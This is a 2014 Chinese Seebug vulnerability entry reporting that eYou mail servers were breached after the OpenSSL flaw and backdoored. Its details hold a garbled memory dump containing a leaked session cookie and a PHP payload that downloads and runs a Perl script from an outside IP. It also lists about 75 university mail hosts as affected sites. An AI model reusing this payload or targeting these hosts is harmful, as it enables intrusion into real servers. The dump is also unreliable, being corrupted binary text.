亿中邮邮件系统大量被入侵安装后门

2014-04-12T00:00:00
ID SSV:95016
Type seebug
Reporter Root
Modified 2014-04-12T00:00:00

Description

简要描述:

最近爆发的openssl漏洞。导致一些人 进入系统安装木马,详细看说明,在下面。

详细说明:

@SC[r+H9w3f"!98532ED/AI42##mail.cuit.edu.cn42it.edu.cnEjtJl%L3A]*.-SfQ7,s1^l1dnt15R;dnt1Fp[.0cookie9emLoginUser=lliu1980; EMPHPSID=cae94rrn3jjorbe1g89m8grht1dnt1`~6&kM\t:) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25Content-Type: application/x-www-form-urlencodedContent-Length: 77

Connection: close<?php system("wget http://94.23.204.157/lol.c -O /tmp/shz;perl /tmp/shz");

?>bfn{fgb9vyKQ|&lt;R5HdL?;zTb3,8eK_tpl_id\"&gt;&lt;\/span&gt;\n &lt;\/td&gt;\n &lt;\/tr--&gt;\n &lt;tr&gt;\n &lt;th width=\"25%\"&gt;\u662f\u5426\u5f00\u542f\u81ea\u52a8\u56de\u590d:&lt;\/th&gt;\n &lt;td&gt;\n &lt;input type=\"radio\" name=\"reply_is_opened\" value=\"1\" id=\"reply_is_opened1_eyou_tpl_id\" \/&gt; \u662f \n &nbsp;&nbsp;\n &lt;input type=\"radio\" name=\"reply_is_opened\" value=\"0\" id=\"reply_is_opened0_eyou_tpl_id\"\/&gt; \u5426 \n &lt;font color=\"red\"&gt;&lt;span id=\"reply_extra_fail_eyou_tpl_id\"&gt;&lt;\/span&gt;&lt;\/font&gt;\n &lt;\/td&gt;\n &lt;\/tr&gt;\n &lt;tr&gt;\n &lt;th width=\"25%\"&gt;\u81ea\u52a8\u56de\u590d\u7684\u8303\u56f4:&lt;\/th&gt;\n &lt;td&gt;\n &lt;input type=\"radio\" name=\"reply_scope\" value=\"0\" id=\"reply_scope0_eyou_tpl_id\" \/&gt; \u5168\u90e8\u5730\u5740\u90fd\u56de\u590d \n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n &lt;input type=\"radio\" name=\"reply_scope\" value=\"3\" id=\"reply_scope3_eyou_tpl_id\"\/&gt; \u53ea\u56de\u590d\u901a\u8baf\u5f55\u4e2d\u7684\u5730\u5740\n &lt;br \/&gt;\n &lt;input type=\"radio\" name=\"reply_scope\" value=\"1\" id=\"reply_scope1_eyou_tpl_id\"\/&gt; \u4e0d\u56de\u590d\u9ed1\u540d\u5355\u4e2d\u7684\u5730\u5740 \n &nbsp;&nbsp;&nbsp;\n &lt;input type=\"radio\" name=\"reply_scope\" value=\"2\" id=\"reply_scope2_eyou_tpl_id\"\/&gt; \u53ea\u56de\u590d\u767d\u540d\u5355\u4e2d\u7684\u5730\u5740\n \n \n &lt;font color=\"red\"&gt;&lt;span id=\"reply_scope_fA6K:K: ngix/1:+:;:]Tranpg: cp &)+/4:@OZnW "#$$$$&'(()+,,./0017:=>@@@@ADEHHJNPQTVX]_`bblnsy{~&8KY~)^[ 2R879\u8bbe\u7f6e\u53ef\u4ee5\u6539\u53d8\u6240\u56de\u590d\u7684\u4fe1\u4ef6\u4e2d\u5305\u542b\u539f\u6587\u7684\u957f\u77ed\u3002<\/p>\n

漏洞证明:

下面列举一些站点。打包一下。

mail.sues.edu.cn mail.hpu.edu.cn mail.bnuz.edu.cn mail.hqu.edu.cn mail.bjtu.edu.cn mail.tjut.edu.cn mail.ccut.edu.cn mail.cuit.edu.cn mail.ntu.edu.cn mail.haust.edu.cn mail.qdu.edu.cn mail.shupl.edu.cn mail.btbu.edu.cn mail.shmtu.edu.cn mail.qhnu.edu.cn mail.scau.edu.cn mail.lyu.edu.cn mail.cug.edu.cn mail.bigc.edu.cn mail.xmut.edu.cn mail.dlnu.edu.cn mail.jssvc.edu.cn mail.xisu.edu.cn mail.jstu.edu.cn mail.xbmu.edu.cn mail.xtu.edu.cn mail.nau.edu.cn mail.lit.edu.cn mail.hubu.edu.cn mail.ybu.edu.cn mail.tust.edu.cn mail.hainnu.edu.cn mail.lntu.edu.cn mail.zjc.zjut.edu.cn mail.njnu.edu.cn mail.just.edu.cn mail.snut.edu.cn mail.njtu.edu.cn mail.usc.edu.cn mail.hist.edu.cn mail.whpu.edu.cn mail.haut.edu.cn mail.sust.edu.cn mail.sqnc.edu.cn mail.hunau.edu.cn mail.jcut.edu.cn mail.tyut.edu.cn mail.tjuci.edu.cn mail.dzu.edu.cn mail.cmc.edu.cn mail.hunnu.edu.cn mail.tsmc.edu.cn mail.utibet.edu.cn mail.jnxy.edu.cn mail.jliae.edu.cn mail.sei.pku.edu.cn mail.tjutcm.edu.cn mail.shec.edu.cn mail.gzccc.edu.cn mail.jxau.edu.cn mail.guat.edu.cn mail.hbpu.edu.cn mail.wtu.edu.cn mail.hiu.edu.cn mail.glcat.edu.cn mail.huat.edu.cn mail.dlu.edu.cn mail.hitsz.edu.cn mail.sdca.edu.cn mail.zknu.edu.cn mail.cczu.edu.cn mail.swfu.edu.cn mail.ndnu.edu.cn